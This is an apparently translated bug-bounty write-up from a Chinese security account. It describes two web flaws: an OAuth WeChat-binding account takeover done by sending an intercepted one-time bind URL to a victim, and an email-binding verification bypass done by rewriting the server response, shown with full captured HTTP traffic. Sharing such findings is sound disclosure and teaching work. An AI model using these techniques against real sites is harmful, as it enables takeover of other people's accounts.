No.0
Foreword
The old-timer at 隐雾 pushed me into doing a share, so I threw together two real-world cases to hand in; experts, go easy on me.
No.1
Account takeover via an OAuth flaw
Principle: exploit an OAuth flaw to take over an account. Generate a code for your own WeChat, bind your own WeChat to someone else's account, and the account is taken over.
First, open the page for binding WeChat.
Click "Bind WeChat".
Then turn on Burp's intercept and scan the QR code with WeChat on your phone.
Record the URL of this request, then drop the request (be careful here: it must be dropped and must not be used by you, because each code can only be used once). Then send the URL to the victim; once they visit it, their account is bound to our WeChat.
Here a secondary account plays the victim. Clicking the URL copied above, the victim's account is bound to my WeChat the moment they click, and the account is taken over.
No.2
Arbitrary email binding
First register an account.
https://XXXX.com/login?
13XXXXXXX7, logging in with the verification code. Currently only verification-code login and WeChat login are available.
After logging in, go to the personal information page.
The email field shows as unbound. When binding, it asks you to verify your identity. Don't request a verification code here; just enter an arbitrary one: 000000.
Capture the request.
POST /api/user/verifyAccount HTTP/2
Host: XXXXX.com
Cookie:XXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://aXXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-Isuda-App-Locale: zh-CN
Csrf-Token: Pg8sCbu1-vfqE2e3_VPM5DDgRFddtT3TFeic
X-Isuda-Date: 2024-08-10T17:11:48Z
Locale: zh-CN
Content-Length: 40
Origin: https://XXXXXX
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"token":"000000","accountType":"phone"}
Look at the response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E
{"status":1,"message":"手机验证码不匹配"}
Modify the response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E
{"status":0,"message":"手机验证码不匹配"}
That bypasses the first step, and the email can now be bound directly.
Bind any email you like here.
No.3
Inner monologue
I've been hunting bugs for a while now and my tuition has paid for itself. The old-timer pestering us all day to do shares is kind of pitiful; can't he write them himself?
No.4
Originally published on the WeChat public account 隐雾安全: Sharing two SRC examples